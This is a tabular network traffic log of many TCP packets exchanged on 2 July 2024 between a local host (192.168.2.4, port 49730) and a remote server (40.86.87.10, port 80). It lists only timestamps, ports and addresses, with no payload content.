Jul 2, 2024 07:31:12.438888073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438898087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438908100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438919067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438920021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438929081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438935041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438940048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438950062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438961029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438963890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438971996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438982964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438990116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438996077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439007044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439007044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439024925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439050913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439677954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439688921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439699888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439711094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439722061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439724922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439734936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439743996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439744949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439755917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439763069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439766884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439776897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439788103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439790964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439798117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439810038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439820051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439825058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439830065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439830065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439841032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439852953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439857006 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439862013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439872026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.439878941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439903021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.439920902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440557003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440568924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440581083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440592051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440603971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440607071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440608978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440619946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440625906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440642118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440644026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440654039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440665007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440665007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440675974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440686941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440690041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440696955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440702915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440711021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440721035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.440735102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.440759897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555176020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555190086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555200100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555247068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555248022 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555257082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555274010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555294991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555391073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555402040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555411100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555421114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555444002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555457115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555526972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555567980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555593967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555603981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555613041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555639029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555656910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555875063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555883884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555895090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555903912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555912971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.555927992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.555955887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556118965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556128025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556137085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556145906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556155920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556164026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556164980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556175947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556176901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556185961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556195021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556195974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556206942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556221962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556253910 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556545019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556555986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556595087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556696892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556705952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556716919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556726933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556740046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556740999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556750059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556770086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556775093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556785107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556785107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556794882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556804895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556816101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556823015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556824923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556834936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556840897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556843996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556854963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556860924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556863070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556873083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.556881905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556900978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.556919098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557698965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557708979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557717085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557727098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557735920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557744980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557749033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557754993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557764053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557773113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557782888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557784081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557791948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557800055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557806015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557810068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557820082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557826996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557830095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557840109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557846069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557851076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557859898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.557873011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.557905912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.558633089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558644056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558655024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558664083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558672905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558681965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558692932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558701992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558703899 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.558711052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558722019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558731079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558741093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558743000 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.558749914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.558779955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.558792114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559360027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559370041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559379101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559389114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559398890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559408903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559410095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559417963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559426069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559437037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559439898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559448957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559456110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559464931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559474945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559474945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559483051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559493065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559494019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559503078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559513092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559521914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559525013 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559530020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.559559107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.559571028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560307980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560317993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560328960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560338974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560347080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560348034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560358047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560367107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560370922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560378075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560386896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560395956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560404062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560405970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560415983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560422897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560424089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560435057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.560435057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560461044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.560501099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675102949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675124884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675137043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675165892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675184965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675282955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675292969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675303936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675314903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675324917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675340891 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675354004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675374985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675563097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675574064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675582886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675592899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675611973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675640106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675709009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675719023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675729036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675736904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675765038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675776005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.675956964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675966978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675976038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675987959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.675997972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676007032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676007986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676017046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676026106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676035881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676038027 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676058054 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676076889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676480055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676498890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676511049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676522017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676532030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676532984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676542044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676542044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676564932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676590919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676824093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676835060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676845074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676853895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676862955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676872969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676882982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676887989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676892996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676902056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676903009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.676934958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.676949978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677333117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677342892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677351952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677361965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677371025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677381039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677382946 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677392006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677402020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677409887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677412987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677422047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677428007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677433014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677445889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677469969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677486897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677901983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677911997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677922010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677932024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677942038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677951097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677952051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677959919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677969933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677975893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.677979946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.677990913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678000927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678010941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678016901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678020954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678028107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678030968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678040028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678046942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678050041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678051949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678057909 CEST	80	49730	40.86.87.10	192.168.2.4
